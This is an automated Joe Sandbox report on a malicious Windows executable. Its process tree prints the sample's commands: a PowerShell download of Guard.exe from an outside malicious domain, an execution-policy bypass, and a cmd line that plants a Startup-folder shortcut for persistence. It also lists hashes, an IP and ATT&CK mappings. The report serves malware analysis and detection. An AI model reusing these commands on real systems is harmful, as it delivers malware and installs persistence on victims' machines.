Windows
Analysis Report
TCKxnQ5CPn.exe
Overview
General Information
Sample name: | TCKxnQ5CPn.exe (renamed because original name is a hash value) |
Original sample name: | 2a89603d2620b2a62113513709e38e95.exe |
Analysis ID: | 1581402 |
MD5: | 2a89603d2620b2a62113513709e38e95 |
SHA1: | e82753848fbd2e4c993661a80ad11cca2fa73b77 |
SHA256: | b52b0e15bcdc6b45a70fbf908381b1385b1a84bf6eb2bcfc35cb684b774021f7 |
Tags: | exe, user-abuse_ch |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- TCKxnQ5CPn.exe (PID: 2748 cmdline: "C:\Users\user\Desktop\TCKxnQ5CPn.exe" MD5: 2A89603D2620B2A62113513709E38E95)
  - powershell.exe (PID: 1004 cmdline: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 6848 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 2804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - Guard.exe (PID: 2988 cmdline: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  - cmd.exe (PID: 5652 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  - conhost.exe (PID: 1096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 5048 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - SwiftWrite.pif (PID: 6832 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
- cleanup
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: |
Source: | Author: Max Altgelt (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: frack113: |
Source: | Author: Max Altgelt (Nextron Systems): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Data Obfuscation |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-27T15:00:50.391754+0100 | 1810003 | 2 | Potentially Bad Traffic | 147.45.49.155 | 443 | 192.168.2.9 | 49707 | TCP |
2024-12-27T15:00:50.134198+0100 | 1810000 | 1 | Potentially Bad Traffic | 192.168.2.9 | 49707 | 147.45.49.155 | 443 | TCP |
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Networking |
---|
Source: | Suricata IDS: |
Source: | HTTP traffic detected: |
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | Suricata IDS: |
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | Code function: | 0_2_00007FF69DBBE968 |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Code function: | 0_2_00007FF69DBC0A6C |
Source: | Code function: | 0_2_00007FF69DBC0D24 | |
Source: | Code function: | 6_2_001A4830 | |
Source: | Code function: | 13_2_00934830 |
Source: | Code function: | 0_2_00007FF69DBC0A6C |
Source: | Code function: | 0_2_00007FF69DBA7E64 |
Source: | Code function: | 6_2_001BD164 | |
Source: | Code function: | 13_2_0094D164 |
System Summary |
---|
Source: | Code function: | 0_2_00007FF69DB337B0 | |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | memstr_23354ca7-0 | |
Source: | String found in binary or memory: | memstr_93d891fa-5 | |
Source: | String found in binary or memory: | memstr_9a5e8ced-9 | |
Source: | String found in binary or memory: | memstr_5972f5ef-7 |
Source: | File created: | Jump to dropped file |
Source: | COM Object queried: | Jump to behavior |
Source: | Code function: | 0_2_00007FF69DBB3E20 |
Source: | Code function: | 0_2_00007FF69DB9D2C4 |
Source: | Code function: | 0_2_00007FF69DBAD750 | |
Source: | Code function: | 6_2_00195778 | |
Source: | Code function: | 13_2_00925778 |
Source: | Dropped File: |
Source: | Classification label: |
Source: | Code function: | 0_2_00007FF69DBB3778 |
Source: | Code function: | 0_2_00007FF69DB9D5CC | |
Source: | Code function: | 0_2_00007FF69DB9CCE0 | |
Source: | Code function: | 6_2_00188DE9 | |
Source: | Code function: | 6_2_00189399 | |
Source: | Code function: | 13_2_00918DE9 | |
Source: | Code function: | 13_2_00919399 |
Source: | Code function: | 0_2_00007FF69DBB59D8 |
Source: | Code function: | 0_2_00007FF69DBABE00 |
Source: | Code function: | 0_2_00007FF69DBB5F2C |
Source: | Code function: | 0_2_00007FF69DB36580 |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | ReversingLabs: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Static file information: |
Source: | Static PE information: |
Data Obfuscation |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 0_2_00007FF69DBC7634 |
Source: | Code function: | 0_2_00007FF69DB67904 | |
Source: | Code function: | 0_2_00007FF69DB673A2 | |
Source: | Code function: | 4_2_00007FF887BB19E1 | |
Source: | Code function: | 6_2_00158B88 | |
Source: | Code function: | 6_2_0014CBF8 | |
Source: | Code function: | 13_2_008E8B88 |
Persistence and Installation Behavior |
---|
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Boot Survival |
---|
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | Icon embedded in binary file: |
Source: | Code function: | 0_2_00007FF69DB54514 | |
Source: | Code function: | 6_2_001B59B3 | |
Source: | Code function: | 6_2_00145EDA | |
Source: | Code function: | 13_2_009459B3 | |
Source: | Code function: | 13_2_008D5EDA |
Source: | Code function: | 6_2_001533B7 |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Evasive API call chain: |
Source: | API coverage: | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Code function: | 0_2_00007FF69DBAC7C0 | |
Source: | Code function: | 0_2_00007FF69DBABC70 | |
Source: | Code function: | 0_2_00007FF69DBAB7C0 | |
Source: | Code function: | 0_2_00007FF69DBB72A8 | |
Source: | Code function: | 0_2_00007FF69DBB71F4 | |
Source: | Code function: | 0_2_00007FF69DB72F50 | |
Source: | Code function: | 0_2_00007FF69DBBA874 | |
Source: | Code function: | 0_2_00007FF69DBBA4F8 | |
Source: | Code function: | 0_2_00007FF69DBB6428 | |
Source: | Code function: | 0_2_00007FF69DBBA350 | |
Source: | Code function: | 6_2_00194005 | |
Source: | Code function: | 6_2_0019494A | |
Source: | Code function: | 6_2_0019C2FF | |
Source: | Code function: | 6_2_0019CD14 | |
Source: | Code function: | 6_2_0019CD9F | |
Source: | Code function: | 6_2_0019F5D8 | |
Source: | Code function: | 6_2_0019F735 | |
Source: | Code function: | 6_2_0019FA36 | |
Source: | Code function: | 6_2_00193CE2 | |
Source: | Code function: | 13_2_00924005 | |
Source: | Code function: | 13_2_0092494A | |
Source: | Code function: | 13_2_0092C2FF | |
Source: | Code function: | 13_2_0092CD9F | |
Source: | Code function: | 13_2_0092CD14 | |
Source: | Code function: | 13_2_0092F5D8 | |
Source: | Code function: | 13_2_0092F735 | |
Source: | Code function: | 13_2_0092FA36 | |
Source: | Code function: | 13_2_00923CE2 |
Source: | Code function: | 0_2_00007FF69DB51D80 |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Binary or memory string: | ||
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 0_2_00007FF69DBC0A00 |
Source: | Code function: | 0_2_00007FF69DB337B0 |
Source: | Code function: | 0_2_00007FF69DB55BC0 |
Source: | Code function: | 0_2_00007FF69DBC7634 |
Source: | Code function: | 0_2_00007FF69DB9D6A0 |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
Source: | Code function: | 0_2_00007FF69DB559C8 | |
Source: | Code function: | 0_2_00007FF69DB557E4 | |
Source: | Code function: | 0_2_00007FF69DB78FE4 | |
Source: | Code function: | 0_2_00007FF69DB6AF58 | |
Source: | Code function: | 6_2_0015A354 | |
Source: | Code function: | 6_2_0015A385 | |
Source: | Code function: | 13_2_008EA385 | |
Source: | Code function: | 13_2_008EA354 |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Process created: |
Source: | Code function: | 0_2_00007FF69DB9CE68 |
Source: | Code function: | 0_2_00007FF69DB337B0 |
Source: | Code function: | 0_2_00007FF69DBA9420 |
Source: | Code function: | 0_2_00007FF69DBAD1A4 |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 0_2_00007FF69DB9C5FC |
Source: | Code function: | 0_2_00007FF69DB9D540 |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: | 0_2_00007FF69DB6FD20 |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Code function: | 0_2_00007FF69DB6BEF8 |
Source: | Code function: | 0_2_00007FF69DB92BCF |
Source: | Code function: | 0_2_00007FF69DB72650 |
Source: | Code function: | 0_2_00007FF69DB51D80 |
Source: | Key value queried: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Code function: | 0_2_00007FF69DBC4074 | |
Source: | Code function: | 0_2_00007FF69DBC3940 | |
Source: | Code function: | 6_2_001A696E | |
Source: | Code function: | 6_2_001A6E32 | |
Source: | Code function: | 13_2_0093696E | |
Source: | Code function: | 13_2_00936E32 |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 1 Scripting | 2 Valid Accounts | 2 Native API | 1 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 21 Input Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 3 PowerShell | 2 Valid Accounts | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 26 System Information Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 12 Process Injection | 311 Masquerading | LSA Secrets | 41 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 2 Valid Accounts | Cached Domain Credentials | 21 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
34% | ReversingLabs | Win32.Ransomware.Generic |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | ReversingLabs | |||
8% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
tiffany-careers.com | 147.45.49.155 | true | false | high | |
nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
true |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
147.45.49.155 | tiffany-careers.com | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1581402 |
Start date and time: | 2024-12-27 14:59:50 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 8m 49s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 17 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | TCKxnQ5CPn.exe (renamed because original name is a hash value) |
Original Sample Name: | 2a89603d2620b2a62113513709e38e95.exe |
Detection: | MAL |
Classification: | mal100.expl.evad.winEXE@15/12@3/1 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 6848 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report creation exceeded maximum time and may have missing disassembly code information.
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size exceeded maximum capacity and may have missing disassembly code.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: TCKxnQ5CPn.exe
Time | Type | Description |
---|---|---|
09:00:45 | API Interceptor | |
09:01:33 | API Interceptor | |
09:01:49 | API Interceptor | |
14:00:58 | Autostart |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
147.45.49.155 | Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
tiffany-careers.com | Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
FREE-NET-ASFREEnetEU | Get hash | malicious | PureLog Stealer, zgRAT | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | XenoRAT | Browse |
| ||
Get hash | malicious | LummaC, Amadey, LummaC Stealer, RedLine | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | LummaC | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | DanaBot | Browse |
| ||
Get hash | malicious | DanaBot | Browse |
| ||
Get hash | malicious | Vidar | Browse |
| ||
Get hash | malicious | Quasar | Browse |
| ||
Get hash | malicious | Quasar | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
C:\Users\Public\Guard.exe | Get hash | malicious | Unknown | Browse | ||
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 893608 |
Entropy (8bit): | 6.62028134425878 |
Encrypted: | false |
SSDEEP: | 12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501 |
MD5: | 18CE19B57F43CE0A5AF149C96AECC685 |
SHA1: | 1BD5CA29FC35FC8AC346F23B155337C5B28BBC36 |
SHA-256: | D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD |
SHA-512: | A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
Process: | C:\Users\user\Desktop\TCKxnQ5CPn.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 493 |
Entropy (8bit): | 5.219373319007497 |
Encrypted: | false |
SSDEEP: | 12:fZ7xFEoFnV/9LBzFj0zUQbnRS6SxJMnCPTFM:fdxCknZ9LzjYnRSb8Cba |
MD5: | 6A07686CA1D212167C47D753146E2147 |
SHA1: | 854DAFCBEAAB17DF65833F4B517E6A8132A5256C |
SHA-256: | 76EC46EDAA320817BC6B5E13161B2F2A0F984061E4C94B5A06D88A00F563BE2A |
SHA-512: | F2F606B3303AD05303E4C0166D4F0F68C74FF71372F3A88CEA6DF515258A22970414421C408853D830B5F09B240C970BE4B30639B55CECA5DD868FFD4570C2C5 |
Malicious: | true |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1149415 |
Entropy (8bit): | 5.199763656099886 |
Encrypted: | false |
SSDEEP: | 12288:28V+jcfSw6xHpcFTkUCroPzZsc2gmjoiVRS9CyaQZflhM8smx8/d:qcLkpcpLCrOzZTob5JAli1 |
MD5: | 83D3BBFFAED5F5FAD2D1C3750DCE9E97 |
SHA1: | 6C94B2ADDC358CFC5B0071727FA9B5FB5F4EFB88 |
SHA-256: | 9A23CA3C836B127A29112AC64B41072CF13B5C3FEA77E2A5B836514B21D7C95A |
SHA-512: | EE9EEF5CCB1FFB147D500D56C90B280790A661C72A38997C7B516370F2E6ACC9BD829DF9D9959C4AD3E21C5E810BD6816FFC1547D470B72C76F46F6593E3094C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 0.34726597513537405 |
Encrypted: | false |
SSDEEP: | 3:Nlll:Nll |
MD5: | 446DD1CF97EABA21CF14D03AEBC79F27 |
SHA1: | 36E4CC7367E0C7B40F4A8ACE272941EA46373799 |
SHA-256: | A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF |
SHA-512: | A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Users\Public\Guard.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1149412 |
Entropy (8bit): | 5.199720915817413 |
Encrypted: | false |
SSDEEP: | 12288:D8V+jcfSw6xHpcFTkUCroPzZsc2gmjoiVRS9CyaQZflhM8smx8/d:DcLkpcpLCrOzZTob5JAli1 |
MD5: | 871CCC978BDD281E863F3495FD632585 |
SHA1: | A411AD4AA70904C07791EB70E98B63DCFD862711 |
SHA-256: | 3A08EBD5BEC10B61C51F4D647A7CFCA5F6197DF364E79F8450AF8E4502F1283B |
SHA-512: | 094100D8A711F5386FF90734DDFA66CDE270CACF9E6E49438E13C4EFE92EF1A535ABEC200B05C2A1EB49DA6FF79CDF89036C971747D6C0E9E80078A51FF715A8 |
Malicious: | false |
Preview: |
Process: | C:\Users\Public\Guard.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 182 |
Entropy (8bit): | 4.728787503041443 |
Encrypted: | false |
SSDEEP: | 3:RiMIpGXfeNH5E5wWAX+PKMEkD5yKXW/Zi+0/RaMl85uWAX+PKMEkD5yKXW/Zi+oM:RiJbNHCwWDMkDrXW/Zz0tl8wWDMkDrXS |
MD5: | F3E27756AE384F28A50A26D42047C0C1 |
SHA1: | 76D4F4BF89EB6DD92C22ACC729A16996FCC42EC7 |
SHA-256: | 1954E6D6ED7E08C90CFF1BA567C85E15889B9098970DBE5F4979684CAD52130D |
SHA-512: | C3C157EBEAA16DCA88B3F615674B4474B5A668D2398838A3096C2AFCCE8DC817F46F0D11CEC9E8474410108A445C5F6453E10BE4E1F807E0589D1CB30B405E81 |
Malicious: | true |
Preview: |
Process: | C:\Users\Public\Guard.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 893608 |
Entropy (8bit): | 6.62028134425878 |
Encrypted: | false |
SSDEEP: | 12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501 |
MD5: | 18CE19B57F43CE0A5AF149C96AECC685 |
SHA1: | 1BD5CA29FC35FC8AC346F23B155337C5B28BBC36 |
SHA-256: | D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD |
SHA-512: | A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558 |
Malicious: | true |
Antivirus: |
|
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Process: | C:\Windows\SysWOW64\cmd.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 97 |
Entropy (8bit): | 4.913583050357082 |
Encrypted: | false |
SSDEEP: | 3:HRAbABGQaFyw3pYoqLTVSRE2J5yKXW/Zi+URAAy:HRYF5yjoqLTwi23yKXW/Zzyy |
MD5: | B196E358FC1F1A8683B763273B6F2FE2 |
SHA1: | D494A69C3B14D95E86242085E57527472F30AEB1 |
SHA-256: | DF5DE160AA2296D525325C499B8E46D179DFD669E4B1BC83324BC04162DF0754 |
